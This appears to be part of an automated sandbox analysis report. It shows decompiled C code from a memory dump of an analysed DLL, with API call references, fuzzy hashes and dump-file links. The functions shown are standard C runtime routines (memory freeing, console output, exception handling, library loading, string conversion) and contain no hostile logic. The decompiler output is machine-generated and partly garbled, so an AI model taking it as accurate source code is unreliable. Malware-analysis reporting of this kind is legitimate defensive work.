                					E6EA57E38(__ecx, 0, _t16,  &_v8);
                					if(_v8 != 1) {
                						goto L2;
                					}
                				}
                				return _t13;
                			}








                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 361d8cae86cc88c3f6ece109b2747686eb4c3269020cc8dce00f7aa58c866e7a
                • Instruction ID: 98dcfac755cfe99b9e25861b320d9de2eac9b7181adff5ced626050835208b15
                • Opcode Fuzzy Hash: 361d8cae86cc88c3f6ece109b2747686eb4c3269020cc8dce00f7aa58c866e7a
                • Instruction Fuzzy Hash: B4E04672A62228EB8710CAC89A0099AB3ACEB49B10F1645AAF904D3300C670EE50C7D4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA58F44(intOrPtr _a4) {
                				intOrPtr _v8;
                				intOrPtr _t25;
                				intOrPtr* _t26;
                				intOrPtr _t28;
                				intOrPtr* _t29;
                				intOrPtr* _t31;
                				intOrPtr* _t45;
                				intOrPtr* _t46;
                				intOrPtr* _t47;
                				intOrPtr* _t55;
                				intOrPtr* _t70;
                				intOrPtr _t74;
                
                				_t74 = _a4;
                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                				if(_t25 != 0 && _t25 != 0x6ea936f0) {
                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                					if(_t45 != 0 &&  *_t45 == 0) {
                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                						if(_t46 != 0 &&  *_t46 == 0) {
                							E6EA56E13(_t46);
                							E6EA5AB1B( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                						if(_t47 != 0 &&  *_t47 == 0) {
                							E6EA56E13(_t47);
                							E6EA5AC19( *((intOrPtr*)(_t74 + 0x88)));
                						}
                						E6EA56E13( *((intOrPtr*)(_t74 + 0x7c)));
                						E6EA56E13( *((intOrPtr*)(_t74 + 0x88)));
                					}
                				}
                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                				if(_t26 != 0 &&  *_t26 == 0) {
                					E6EA56E13( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                					E6EA56E13( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                					E6EA56E13( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                					E6EA56E13( *((intOrPtr*)(_t74 + 0x8c)));
                				}
                				E6EA590B7( *((intOrPtr*)(_t74 + 0x9c)));
                				_t28 = 6;
                				_t55 = _t74 + 0xa0;
                				_v8 = _t28;
                				_t70 = _t74 + 0x28;
                				do {
                					if( *((intOrPtr*)(_t70 - 8)) != 0x6ea93630) {
                						_t31 =  *_t70;
                						if(_t31 != 0 &&  *_t31 == 0) {
                							E6EA56E13(_t31);
                							E6EA56E13( *_t55);
                						}
                						_t28 = _v8;
                					}
                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                						_t22 = _t70 - 4; // 0xfffffe7b
                						_t29 =  *_t22;
                						if(_t29 != 0 &&  *_t29 == 0) {
                							E6EA56E13(_t29);
                						}
                						_t28 = _v8;
                					}
                					_t55 = _t55 + 4;
                					_t70 = _t70 + 0x10;
                					_t28 = _t28 - 1;
                					_v8 = _t28;
                				} while (_t28 != 0);
                				return E6EA56E13(_t74);
                			}
















                APIs
                • ___free_lconv_mon.LIBCMT ref: 6EA58F88
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB38
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB4A
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB5C
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB6E
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB80
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AB92
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABA4
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABB6
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABC8
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABDA
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABEC
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5ABFE
                  • Part of subcall function 6EA5AB1B: _free.LIBCMT ref: 6EA5AC10
                • _free.LIBCMT ref: 6EA58F7D
                  • Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
                  • Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B
                • _free.LIBCMT ref: 6EA58F9F
                • _free.LIBCMT ref: 6EA58FB4
                • _free.LIBCMT ref: 6EA58FBF
                • _free.LIBCMT ref: 6EA58FE1
                • _free.LIBCMT ref: 6EA58FF4
                • _free.LIBCMT ref: 6EA59002
                • _free.LIBCMT ref: 6EA5900D
                • _free.LIBCMT ref: 6EA59045
                • _free.LIBCMT ref: 6EA5904C
                • _free.LIBCMT ref: 6EA59069
                • _free.LIBCMT ref: 6EA59081
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 31102c1d5f0fccab00bded20b3953ebc524a099c139fc33ae5344c71d8750c79
                • Instruction ID: cee99080f5213e526db3bc3ae4a7ad01a9810f3a3bd33c5f339a79a4ab4ae761
                • Opcode Fuzzy Hash: 31102c1d5f0fccab00bded20b3953ebc524a099c139fc33ae5344c71d8750c79
                • Instruction Fuzzy Hash: 2D319071A143019FEB609AB4DA00B9A73E9EF40314F244C6DE468DB390DF35ADF49B18
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E6EA566C1(void* __esi, char _a4) {
                				void* _v5;
                				char _v12;
                				char _v16;
                				char _v20;
                				void* __ebp;
                				char _t55;
                				char _t61;
                				intOrPtr _t67;
                				void* _t71;
                
                				_t71 = __esi;
                				_t36 = _a4;
                				_t67 =  *_a4;
                				_t75 = _t67 - 0x6ea5ea28;
                				if(_t67 != 0x6ea5ea28) {
                					E6EA56E13(_t67);
                					_t36 = _a4;
                				}
                				E6EA56E13( *((intOrPtr*)(_t36 + 0x3c)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x30)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x34)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x38)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x28)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x2c)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x40)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x44)));
                				E6EA56E13( *((intOrPtr*)(_a4 + 0x360)));
                				_v16 =  &_a4;
                				_t55 = 5;
                				_v12 = _t55;
                				_v20 = _t55;
                				_push( &_v12);
                				_push( &_v16);
                				_push( &_v20);
                				E6EA56509(_t75);
                				_v16 =  &_a4;
                				_t61 = 4;
                				_v20 = _t61;
                				_v12 = _t61;
                				_push( &_v20);
                				_push( &_v16);
                				_push( &_v12);
                				return E6EA5656A(_t71, _t75);
                			}













                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 5e52dbfc21cf87756d78d3f2752028d213206b3bb7014b8c8c108d0039aa2fba
                • Instruction ID: ebc30eb349649671a4a409c4a7eec3cd1a4467783a038a83503868cb0a331767
                • Opcode Fuzzy Hash: 5e52dbfc21cf87756d78d3f2752028d213206b3bb7014b8c8c108d0039aa2fba
                • Instruction Fuzzy Hash: 9A21F776D10108AFCB01DFD4C980DDE7BB8AF48300F1049A6F9049B320DB75EAA49B84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E6EA5A0F4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				signed char* _v36;
                				long _v40;
                				intOrPtr _v44;
                				signed char* _v48;
                				void* _v52;
                				signed int _v56;
                				int _v60;
                				long _v64;
                				signed int _t81;
                				signed int _t83;
                				int _t89;
                				signed char* _t91;
                				void* _t99;
                				signed char* _t100;
                				long _t104;
                				void _t112;
                				void* _t121;
                				signed int _t126;
                				signed int _t128;
                				signed char _t132;
                				signed char _t138;
                				intOrPtr _t139;
                				signed int _t141;
                				signed char* _t143;
                				intOrPtr* _t145;
                				signed int _t146;
                				void* _t147;
                
                				_t81 =  *0x6ea93004; // 0x90a7628e
                				_v8 = _t81 ^ _t146;
                				_t83 = _a8;
                				_t128 = _t83 >> 6;
                				_t126 = (_t83 & 0x0000003f) * 0x30;
                				_t143 = _a12;
                				_v48 = _t143;
                				_v56 = _t128;
                				_v52 =  *((intOrPtr*)( *((intOrPtr*)(0x6ea93f20 + _t128 * 4)) + _t126 + 0x18));
                				_v44 = _a16 + _t143;
                				_t89 = GetConsoleCP();
                				_t145 = _a4;
                				_v60 = _t89;
                				 *_t145 = 0;
                				 *((intOrPtr*)(_t145 + 4)) = 0;
                				 *((intOrPtr*)(_t145 + 8)) = 0;
                				_t91 = _t143;
                				if(_t91 < _v44) {
                					_v36 =  &(_t91[1]);
                					do {
                						_v28 = 0;
                						_v31 =  *_t143;
                						_t139 =  *((intOrPtr*)(0x6ea93f20 + _v56 * 4));
                						_t132 =  *(_t139 + _t126 + 0x2d);
                						if((_t132 & 0x00000004) == 0) {
                							if( *((intOrPtr*)(E6EA58EA1(_t126, _t139) + ( *_t143 & 0x000000ff) * 2)) >= 0) {
                								_push(1);
                								_push(_t143);
                								goto L9;
                							} else {
                								if(_v36 >= _v44) {
                									_t141 = _v56;
                									 *((char*)( *((intOrPtr*)(0x6ea93f20 + _t141 * 4)) + _t126 + 0x2e)) =  *_t143;
                									 *( *((intOrPtr*)(0x6ea93f20 + _t141 * 4)) + _t126 + 0x2d) =  *( *((intOrPtr*)(0x6ea93f20 + _t141 * 4)) + _t126 + 0x2d) | 0x00000004;
                									 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;
                								} else {
                									_t121 = E6EA58D6F( &_v28, _t143, 2);
                									_t147 = _t147 + 0xc;
                									if(_t121 != 0xffffffff) {
                										_t143 =  &(_t143[1]);
                										_t100 =  &(_v36[1]);
                										goto L11;
                									}
                								}
                							}
                						} else {
                							_t138 = _t132 & 0x000000fb;
                							_v16 =  *((intOrPtr*)(_t139 + _t126 + 0x2e));
                							_push(2);
                							_v15 = _t138;
                							 *(_t139 + _t126 + 0x2d) = _t138;
                							_push( &_v16);
                							L9:
                							_push( &_v28);
                							_t99 = E6EA58D6F();
                							_t147 = _t147 + 0xc;
                							if(_t99 != 0xffffffff) {
                								_t100 = _v36;
                								L11:
                								_t143 =  &(_t143[1]);
                								_v36 =  &(_t100[1]);
                								_t104 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                								_v64 = _t104;
                								if(_t104 != 0) {
                									if(WriteFile(_v52,  &_v24, _t104,  &_v40, 0) == 0) {
                										L21:
                										 *_t145 = GetLastError();
                									} else {
                										 *((intOrPtr*)(_t145 + 4)) = _t143 - _v48 +  *((intOrPtr*)(_t145 + 8));
                										if(_v40 >= _v64) {
                											if(_v31 != 0xa) {
                												goto L18;
                											} else {
                												_t112 = 0xd;
                												_v32 = _t112;
                												if(WriteFile(_v52,  &_v32, 1,  &_v40, 0) == 0) {
                													goto L21;
                												} else {
                													if(_v40 >= 1) {
                														 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t145 + 8)) + 1;
                														 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t145 + 4)) + 1;
                														goto L18;
                													}
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                						goto L22;
                						L18:
                					} while (_t143 < _v44);
                				}
                				L22:
                				return E6EA53252(_v8 ^ _t146);
                			}






































                APIs
                • GetConsoleCP.KERNEL32(00000000,00000001,00000020,?,?,?,?,?,?,?,6EA5A880,00000008,00000001,00000020,0000002C,?), ref: 6EA5A136
                • __fassign.LIBCMT ref: 6EA5A1B5
                • __fassign.LIBCMT ref: 6EA5A1D4
                • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 6EA5A201
                • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6EA5A880), ref: 6EA5A221
                • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6EA5A880), ref: 6EA5A25B
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: c90af5f1bcdfae3d3246d0ebec8d87bdb5bfd7ac7ef73a92b4dd21d44d05c6da
                • Instruction ID: 83354ae039f4a0a7ce6e0ef9b40d13ed968124f01418577c5de35acdb4c58892
                • Opcode Fuzzy Hash: c90af5f1bcdfae3d3246d0ebec8d87bdb5bfd7ac7ef73a92b4dd21d44d05c6da
                • Instruction Fuzzy Hash: D95180B1A102499FDB00CFE8C885AEEBBF9FF09310F14852AE556EB351D7309991CB65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E6EA53E70(void* __ebx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                				char _v5;
                				signed int _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				char _t51;
                				signed int _t58;
                				intOrPtr _t59;
                				void* _t60;
                				intOrPtr* _t61;
                				intOrPtr _t63;
                				intOrPtr* _t64;
                				intOrPtr* _t67;
                				intOrPtr _t71;
                				intOrPtr _t73;
                				signed int _t75;
                				char _t77;
                				intOrPtr _t90;
                				intOrPtr _t93;
                				intOrPtr* _t95;
                				intOrPtr* _t97;
                				void* _t98;
                				void* _t101;
                				void* _t102;
                				void* _t110;
                
                				_t71 = _a8;
                				_v5 = 0;
                				_t93 = _t71 + 0x10;
                				_push(_t93);
                				_v16 = 1;
                				_v20 = _t93;
                				_v12 =  *(_t71 + 8) ^  *0x6ea93004;
                				E6EA53E30( *(_t71 + 8) ^  *0x6ea93004);
                				E6EA54317(_a12);
                				_t51 = _a4;
                				_t102 = _t101 + 0xc;
                				_t90 =  *((intOrPtr*)(_t71 + 0xc));
                				if(( *(_t51 + 4) & 0x00000066) != 0) {
                					__eflags = _t90 - 0xfffffffe;
                					if(_t90 != 0xfffffffe) {
                						E6EA54300(_t71, 0xfffffffe, _t93, 0x6ea93004);
                						goto L14;
                					}
                					goto L15;
                				} else {
                					_v32 = _t51;
                					_v28 = _a12;
                					 *((intOrPtr*)(_t71 - 4)) =  &_v32;
                					if(_t90 == 0xfffffffe) {
                						L15:
                						return _v16;
                					} else {
                						do {
                							_t75 = _v12;
                							_t20 = _t90 + 2; // 0x3
                							_t58 = _t90 + _t20 * 2;
                							_t73 =  *((intOrPtr*)(_t75 + _t58 * 4));
                							_t59 = _t75 + _t58 * 4;
                							_t76 =  *((intOrPtr*)(_t59 + 4));
                							_v24 = _t59;
                							if( *((intOrPtr*)(_t59 + 4)) == 0) {
                								_t77 = _v5;
                								goto L8;
                							} else {
                								_t60 = E6EA542B0(_t76, _t93);
                								_t77 = 1;
                								_v5 = 1;
                								_t110 = _t60;
                								if(_t110 < 0) {
                									_v16 = 0;
                									L14:
                									_push(_t93);
                									E6EA53E30(_v12);
                									goto L15;
                								} else {
                									if(_t110 > 0) {
                										_t61 = _a4;
                										__eflags =  *_t61 - 0xe06d7363;
                										if( *_t61 == 0xe06d7363) {
                											__eflags =  *0x6ea5ea20;
                											if(__eflags != 0) {
                												_t67 = E6EA5CCA0(__eflags, 0x6ea5ea20);
                												_t102 = _t102 + 4;
                												__eflags = _t67;
                												if(_t67 != 0) {
                													_t97 =  *0x6ea5ea20; // 0x6ea54f0c
                													 *0x6ea5e104(_a4, 1);
                													 *_t97();
                													_t93 = _v20;
                													_t102 = _t102 + 8;
                												}
                												_t61 = _a4;
                											}
                										}
                										E6EA542E4(_t61, _a8, _t61);
                										_t63 = _a8;
                										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
                										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
                											E6EA54300(_t63, _t90, _t93, 0x6ea93004);
                											_t63 = _a8;
                										}
                										 *((intOrPtr*)(_t63 + 0xc)) = _t73;
                										_t64 = E6EA53E30(_v12);
                										E6EA542C8();
                										asm("int3");
                										__imp__InterlockedFlushSList(_v32, _t98, _t93);
                										__eflags = _t64;
                										if(_t64 != 0) {
                											_push(_t93);
                											do {
                												_t95 =  *_t64;
                												E6EA562C6(_t64);
                												_t64 = _t95;
                												__eflags = _t95;
                											} while (_t95 != 0);
                											return _t64;
                										}
                										return _t64;
                									} else {
                										goto L8;
                									}
                								}
                							}
                							goto L29;
                							L8:
                							_t90 = _t73;
                						} while (_t73 != 0xfffffffe);
                						if(_t77 != 0) {
                							goto L14;
                						}
                						goto L15;
                					}
                				}
                				L29:
                			}































                APIs
                • _ValidateLocalCookies.LIBCMT ref: 6EA53E9B
                • ___except_validate_context_record.LIBVCRUNTIME ref: 6EA53EA3
                • _ValidateLocalCookies.LIBCMT ref: 6EA53F31
                • __IsNonwritableInCurrentImage.LIBCMT ref: 6EA53F5C
                • _ValidateLocalCookies.LIBCMT ref: 6EA53FB1
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: f5cdb3a5127aaadaefd60a890f742f5eb6d09286a2e7f22cd7a7d51a4558eef1
                • Instruction ID: d31ff337f4932b4049b2c787349c0571f10d29e09cdcc5be7d1a28b822a7aa68
                • Opcode Fuzzy Hash: f5cdb3a5127aaadaefd60a890f742f5eb6d09286a2e7f22cd7a7d51a4558eef1
                • Instruction Fuzzy Hash: 5E411430A00209ABCF00DFE8C848A9EBBF5BF81328F148595E8566F355D731DDA9CB84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA57CEE(void* __ecx, signed int* _a4, intOrPtr _a8) {
                				signed int* _v8;
                				void** _t12;
                				void* _t16;
                				void* _t18;
                				signed int _t22;
                				WCHAR* _t23;
                				void** _t26;
                				signed int* _t29;
                				void* _t32;
                				void* _t34;
                
                				_t29 = _a4;
                				while(_t29 != _a8) {
                					_t22 =  *_t29;
                					_t12 = 0x6ea93e40 + _t22 * 4;
                					_t32 =  *_t12;
                					_v8 = _t12;
                					if(_t32 == 0) {
                						_t23 =  *(0x6ea5ed10 + _t22 * 4);
                						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                						if(_t32 != 0) {
                							L12:
                							_t26 = _v8;
                							 *_t26 = _t32;
                							if( *_t26 != 0) {
                								FreeLibrary(_t32);
                							}
                							L14:
                							if(_t32 != 0) {
                								_t16 = _t32;
                								L18:
                								return _t16;
                							}
                							L15:
                							_t29 =  &(_t29[1]);
                							continue;
                						}
                						_t18 = GetLastError();
                						if(_t18 != 0x57) {
                							L9:
                							_t32 = 0;
                							L10:
                							if(_t32 != 0) {
                								goto L12;
                							}
                							 *_v8 = _t18 | 0xffffffff;
                							goto L15;
                						}
                						_t18 = E6EA56487(_t23, L"api-ms-", 7);
                						_t34 = _t34 + 0xc;
                						if(_t18 == 0) {
                							goto L9;
                						}
                						_t18 = E6EA56487(_t23, L"ext-ms-", 7);
                						_t34 = _t34 + 0xc;
                						if(_t18 == 0) {
                							goto L9;
                						}
                						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                						_t32 = _t18;
                						goto L10;
                					}
                					if(_t32 == 0xffffffff) {
                						goto L15;
                					}
                					goto L14;
                				}
                				_t16 = 0;
                				goto L18;
                			}














                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: api-ms-$ext-ms-
                • API String ID: 0-537541572
                • Opcode ID: a9cfd64c621555dfc64af9975f205a2ff2585261324095c5a08073e7ce9bfb33
                • Instruction ID: e712434c767afdbe88b3f8a396b38d34e8eabef58aba35fe5818cde5502aa7e5
                • Opcode Fuzzy Hash: a9cfd64c621555dfc64af9975f205a2ff2585261324095c5a08073e7ce9bfb33
                • Instruction Fuzzy Hash: 6621C673A45721BFDA518AE98C44B7A3768AF43760F258610FD15BB3C0E630DDA189E8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA5ACBA(intOrPtr _a4) {
                				void* _t18;
                
                				_t45 = _a4;
                				if(_a4 != 0) {
                					E6EA5AC82(_t45, 7);
                					E6EA5AC82(_t45 + 0x1c, 7);
                					E6EA5AC82(_t45 + 0x38, 0xc);
                					E6EA5AC82(_t45 + 0x68, 0xc);
                					E6EA5AC82(_t45 + 0x98, 2);
                					E6EA56E13( *((intOrPtr*)(_t45 + 0xa0)));
                					E6EA56E13( *((intOrPtr*)(_t45 + 0xa4)));
                					E6EA56E13( *((intOrPtr*)(_t45 + 0xa8)));
                					E6EA5AC82(_t45 + 0xb4, 7);
                					E6EA5AC82(_t45 + 0xd0, 7);
                					E6EA5AC82(_t45 + 0xec, 0xc);
                					E6EA5AC82(_t45 + 0x11c, 0xc);
                					E6EA5AC82(_t45 + 0x14c, 2);
                					E6EA56E13( *((intOrPtr*)(_t45 + 0x154)));
                					E6EA56E13( *((intOrPtr*)(_t45 + 0x158)));
                					E6EA56E13( *((intOrPtr*)(_t45 + 0x15c)));
                					return E6EA56E13( *((intOrPtr*)(_t45 + 0x160)));
                				}
                				return _t18;
                			}





                APIs
                  • Part of subcall function 6EA5AC82: _free.LIBCMT ref: 6EA5ACA7
                • _free.LIBCMT ref: 6EA5AD08
                  • Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
                  • Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B
                • _free.LIBCMT ref: 6EA5AD13
                • _free.LIBCMT ref: 6EA5AD1E
                • _free.LIBCMT ref: 6EA5AD72
                • _free.LIBCMT ref: 6EA5AD7D
                • _free.LIBCMT ref: 6EA5AD88
                • _free.LIBCMT ref: 6EA5AD93
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 0f88698384da84cd99c7164f25d6bd77e18ebaa9143610d424fb4caa12273783
                • Instruction ID: 69850853050cda0cd5e8214ad40454bb31d06bf05fb64a7d5785562e09e5d2c5
                • Opcode Fuzzy Hash: 0f88698384da84cd99c7164f25d6bd77e18ebaa9143610d424fb4caa12273783
                • Instruction Fuzzy Hash: 7C119331A01704B7D670A7F0CD09FC77B9D7F40304F404C1866AB66390DB34AEB05A64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E6EA59992(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				signed int _t41;
                				signed int _t49;
                				signed int _t56;
                				int _t60;
                				intOrPtr _t63;
                				int _t64;
                				int _t68;
                				short* _t71;
                				int _t83;
                				int _t86;
                				short* _t89;
                				int _t91;
                				signed int _t94;
                				short* _t95;
                				void* _t98;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t41 =  *0x6ea93004; // 0x90a7628e
                				_v8 = _t41 ^ _t94;
                				_push(__esi);
                				_t91 = _a20;
                				if(_t91 > 0) {
                					_t68 = E6EA5AD9E(_a16, _t91);
                					_t98 = _t68 - _t91;
                					_t4 = _t68 + 1; // 0x1
                					_t91 = _t4;
                					if(_t98 >= 0) {
                						_t91 = _t68;
                					}
                				}
                				_t86 = _a32;
                				if(_t86 == 0) {
                					_t86 =  *( *_a4 + 8);
                					_a32 = _t86;
                				}
                				_t83 = MultiByteToWideChar(_t86, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t91, 0, 0);
                				_v12 = _t83;
                				if(_t83 == 0) {
                					L39:
                					return E6EA53252(_v8 ^ _t94);
                				} else {
                					_t17 = _t83 + _t83 + 8; // 0x8
                					_t75 = _t17;
                					asm("sbb eax, eax");
                					_t49 = _t83 + _t83 & _t17;
                					if(_t49 == 0) {
                						_t71 = 0;
                						L15:
                						if(_t71 == 0 || MultiByteToWideChar(_t86, 1, _a16, _t91, _t71, _t83) == 0) {
                							L37:
                							_t93 = 0;
                							goto L38;
                						} else {
                							_t88 = _v12;
                							_t93 = E6EA5804C(_t75, _t91, _a8, _a12, _t71, _v12, 0, 0, 0, 0, 0);
                							if(_t93 == 0) {
                								goto L37;
                							}
                							if((_a12 & 0x00000400) == 0) {
                								_t31 = _t93 + _t93 + 8; // 0x8
                								_t77 = _t31;
                								asm("sbb eax, eax");
                								_t56 = _t93 + _t93 & _t31;
                								if(_t56 == 0) {
                									_t89 = 0;
                									L31:
                									if(_t89 == 0 || E6EA5804C(_t77, _t93, _a8, _a12, _t71, _v12, _t89, _t93, 0, 0, 0) == 0) {
                										L36:
                										E6EA59972(_t89);
                										goto L37;
                									} else {
                										_push(0);
                										_push(0);
                										if(_a28 != 0) {
                											_push(_a28);
                											_push(_a24);
                										} else {
                											_push(0);
                											_push(0);
                										}
                										_t60 = WideCharToMultiByte(_a32, 0, _t89, _t93, ??, ??, ??, ??);
                										_t93 = _t60;
                										if(_t60 != 0) {
                											E6EA59972(_t89);
                											L38:
                											E6EA59972(_t71);
                											goto L39;
                										} else {
                											goto L36;
                										}
                									}
                								}
                								if(_t56 > 0x400) {
                									_t89 = E6EA58C23(_t77, _t56);
                									_pop(_t77);
                									if(_t89 == 0) {
                										goto L36;
                									}
                									 *_t89 = 0xdddd;
                									L29:
                									_t89 =  &(_t89[4]);
                									goto L31;
                								}
                								E6EA5CFE0();
                								_t89 = _t95;
                								if(_t89 == 0) {
                									goto L36;
                								}
                								 *_t89 = 0xcccc;
                								goto L29;
                							}
                							_t63 = _a28;
                							if(_t63 == 0) {
                								goto L38;
                							}
                							if(_t93 > _t63) {
                								goto L37;
                							}
                							_t64 = E6EA5804C(0, _t93, _a8, _a12, _t71, _t88, _a24, _t63, 0, 0, 0);
